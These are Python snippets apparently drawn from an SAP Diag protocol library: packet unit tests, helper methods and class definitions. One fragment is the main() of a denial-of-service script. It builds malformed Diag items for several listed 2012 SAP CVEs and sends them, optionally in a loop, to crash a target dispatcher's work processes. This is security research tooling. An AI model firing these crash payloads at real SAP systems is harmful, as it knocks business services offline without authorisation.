def test_sapdiag_items_lookup(self): """Test lookup and filtering of SAPDiagItems inside a SAPDiag packet""" sapdiag = SAPDiag() sapdiag_ses_item = SAPDiagItem(item_type="SES") sapdiag.message.append(sapdiag_ses_item) sapdiag_appl_item = SAPDiagItem(item_type="APPL", item_id="ST_USER", item_sid="RFC_PARENT_UUID") sapdiag.message.append(sapdiag_appl_item) self.assertIn(sapdiag_ses_item, sapdiag.get_item(0x1)) self.assertIn(sapdiag_ses_item, sapdiag.get_item("SES")) self.assertNotIn(sapdiag_ses_item, sapdiag.get_item(0x10)) self.assertNotIn(sapdiag_ses_item, sapdiag.get_item("APPL")) self.assertIn(sapdiag_appl_item, sapdiag.get_item(0x10)) self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL")) self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL", 0x04)) self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_USER")) self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL", 0x04, 0x10)) self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_USER", 0x10)) self.assertIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_USER", "RFC_PARENT_UUID")) self.assertNotIn(sapdiag_appl_item, sapdiag.get_item(0x1)) self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL4")) self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL", 0x06)) self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_R3INFO")) self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL", 0x04, 0x02)) self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_USER", 0x02)) self.assertNotIn(sapdiag_appl_item, sapdiag.get_item("APPL", "ST_USER", "CONNECT")) self.assertListEqual([sapdiag_ses_item, sapdiag_appl_item], sapdiag.get_item([0x01, 0x10])) self.assertListEqual([sapdiag_ses_item, sapdiag_appl_item], sapdiag.get_item(["SES", "APPL"])) self.assertIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], [0x04, 0x06])) self.assertIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], ["ST_USER", "ST_R3INFO"])) self.assertIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], 0x04, [0x02, 0x10])) self.assertIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], "ST_USER", ["RFC_PARENT_UUID", "CONNECT"])) self.assertNotIn(sapdiag_appl_item, sapdiag.get_item(["SES", "APPL4"])) self.assertNotIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], ["ST_R3INFO"])) self.assertNotIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], ["ST_USER"], ["CONNECT"])) # Insert a wrong item and observe that the lookup still works sapdiag.message.append(Raw("\x00" * 10)) self.assertIn(sapdiag_ses_item, sapdiag.get_item("SES")) self.assertIn(sapdiag_appl_item, sapdiag.get_item(["APPL"], "ST_USER", ["RFC_PARENT_UUID", "CONNECT"]))
def test_sapdiag_header_dissection_compressed(self): """Test SAPDiag headers dissection with compression""" diag_item = SAPDiagItem(item_value="TEST_COMPRESSED") diag_header_compr = SAPDiag(compress=1) diag_header_compr.message.append(diag_item) new_diag_header_compr = SAPDiag(str(diag_header_compr)) self.assertEqual(str(diag_header_compr.message[0]), str(new_diag_header_compr.message[0]))
def test_sapdiag_header_dissection_plain(self): """Test SAPDiag headers dissection without compression""" diag_item = SAPDiagItem(item_value="TEST_PLAIN") diag_header_plain = SAPDiag(compress=0) diag_header_plain.message.append(diag_item) new_diag_header_plain = SAPDiag(str(diag_header_plain)) self.assertEqual(str(diag_header_plain), str(new_diag_header_plain))
def interact(self, message): """Interacts with the SAP Diag server, adding the :class:`SAPDiagStep` item and ending with a 'end of message' item. :param message: items to send :type message: ``list`` of :class:`SAPDiagItem` :return: server's response :rtype: :class:`SAPNI<SAPNI.SAPNI>` """ if self.initialized: self.step += 1 message.insert(0, SAPDiagItem(item_type="APPL", item_id="ST_USER", item_sid=0x26, item_value=SAPDiagStep(step=self.step))) message.append(SAPDiagItem(item_type="EOM")) return self.sr_message(message) else: return None
def interact(self, message): """Interacts with the SAP Diag server, adding the L{SAPDiagStep} item and ending with a 'end of message' item. @param message: items to send @type message: C{list} of L{SAPDiagItem} @return: server's response @rtype: L{SAPNI<SAPNI.SAPNI>} """ if self.initialized: self.step = self.step + 1 message.insert(0, SAPDiagItem(item_type="APPL", item_id="ST_USER", item_sid=0x26, item_value=SAPDiagStep(step=self.step))) message.append(SAPDiagItem(item_type="EOM")) return self.sr_message(message) else: return None
def get_support_data_item(self, support_data): if isinstance(support_data, str): support_data = SAPDiagSupportBits(unhex(support_data)) if isinstance(support_data, SAPDiagSupportBits): support_data = SAPDiagItem(item_type="APPL", item_id="ST_USER", item_sid="SUPPORTDATA", item_value=support_data) if isinstance(support_data, SAPDiagItem): return support_data return None
def main(): options = parse_options() if options.verbose: logging.basicConfig(level=logging.DEBUG) print("[*] Testing Dispatcher DoS vulnerabilities on host %s:%d" % (options.remote_host, options.remote_port)) # Crafting the item according to the CVE selected if options.cve == 1: print("[*] Crash in DiagTraceHex (CVE-2012-2612) using a DataStream (Diag XML Blob) " "(requires Dialog Developer Trace enabled at level 2 or 3)") item = SAPDiagItem(item_type="DIAG_XMLBLOB", item_length=0xFFFFFFFF, item_value="Crash!") elif options.cve == 2: print("[*] Crash in DiagTraceHex (CVE-2012-2612) using a variable ST_USER ST_USER_PASSPORT_DATA item " "(requires Dialog Developer Trace enabled at level 2 or 3)") item = SAPDiagItem(item_type="APPL4", item_id="ST_USER", item_sid=0x18, item_length=0xFFFFFFFF, item_value="Crash!") elif options.cve == 3: print("[*] Crash in DiagTraceAtoms (CVE-2012-2511) using a DYNT ATOM item " "(requires Dialog Developer Trace enabled at level 2 or 3)") item = SAPDiagItem(item_type="APPL4", item_id="DYNT", item_sid=0x02, item_value="\x80" * 8) elif options.cve == 4: print("[*] Crash in DiagTraceStreamI (CVE-2012-2512) using a RCUI RCUI_CONNECT_DATA item " "(requires Dialog Developer Trace enabled at level 2 or 3)") item = SAPDiagItem(item_type="APPL", item_id="RCUI", item_sid=0x09, item_length=0xFF, item_value="\x12\x1A\x59\x51") elif options.cve == 5: print("[*] Crash in diaginput (CVE-2012-2513) using a VARINFO MAINAREA_PIXELSIZE item") item = SAPDiagItem(item_type="APPL", item_id="VARINFO", item_sid=0x0e, item_value="A" * 10) elif options.cve == 6: print("[*] Crash in DiagiEventSource (CVE-2012-2514) using a UI_EVENT UI_EVENT_SOURCE item") item = SAPDiagItem(item_type="APPL", item_id="UI_EVENT", item_sid=0x01, item_value="A" * 16) else: print("[-] Invalid CVE specified!") return if options.loop: try: while True: if options.verbose: print("[*] Started a new round") send_crash(options.remote_host, options.remote_port, item, options.number, options.verbose, options.terminal, options.route_string) sleep(options.delay) except KeyboardInterrupt: print("[*] Cancelled by the user") else: print("[*] Selected a single round") send_crash(options.remote_host, options.remote_port, item, options.number, options.verbose, options.terminal, options.route_string) print("[*] Crash sent, take a look at the work processes !")
def test_sapdiag_items_bind(self): """Test binding of SAPDiagItem classes""" class SAPDiagItemTest(Packet): fields_desc = [StrField("strfield", None)] bind_diagitem(SAPDiagItemTest, "APPL", 0x99, 0xff) item_string = "strfield" item_value = SAPDiagItemTest(strfield=item_string) item = SAPDiagItem("\x10\x99\xff" + pack("!H", len(item_string)) + item_string) self.assertEqual(item.item_value, item_value) self.assertEqual(item.item_length, len(item_string)) self.assertEqual(item.item_value.strfield, item_string) self.assertEqual(str(item.item_value), str(item_value)) self.assertIs(diag_item_get_class(item, "APPL", 0x99, 0xff), SAPDiagItemTest)
def test_sapdiag_header_build(self): """Test SAPDiag headers building""" diag_item = SAPDiagItem(item_value="TEST") diag_header_plain = SAPDiag(compress=0) diag_header_plain.message.append(diag_item) diag_plain_message = str(diag_header_plain.message) diag_header_compr = SAPDiag(compress=1) diag_header_compr.message.append(diag_item) diag_compr_message = str(diag_header_compr.message) self.assertEqual(diag_plain_message, diag_compr_message) diag_header_compr.compress = 0 self.assertEqual(str(diag_header_plain), str(diag_header_compr))
# 3000 0x00000bb8 SAP GUI Windows # class SAPDiagUserConnect(Packet): name = "SAP Diag User Connect" fields_desc = [ IntField("protocol_version", 100200), IntField("code_page", 1100), IntField("ws_type", 5001) ] bind_diagitem(SAPDiagUserConnect, "APPL", 0x04, 0x02) user_connect_compressed = \ SAPDiagItem(item_type="APPL", item_id="ST_USER", item_sid=0x02, item_value=SAPDiagUserConnect()) user_connect_uncompressed = \ SAPDiagItem(item_type="APPL", item_id="ST_USER", item_sid=0x02, item_value=SAPDiagUserConnect(protocol_version=200)) # Diag Dialog step item class SAPDiagStep(Packet): name = "SAP Diag Dialog Step" fields_desc = [IntField("step", 0)]
def test_sapdiag_item(self): """Test construction of SAPDiag Items""" with self.assertRaises(KeyError): SAPDiagItem(item_type="LALA")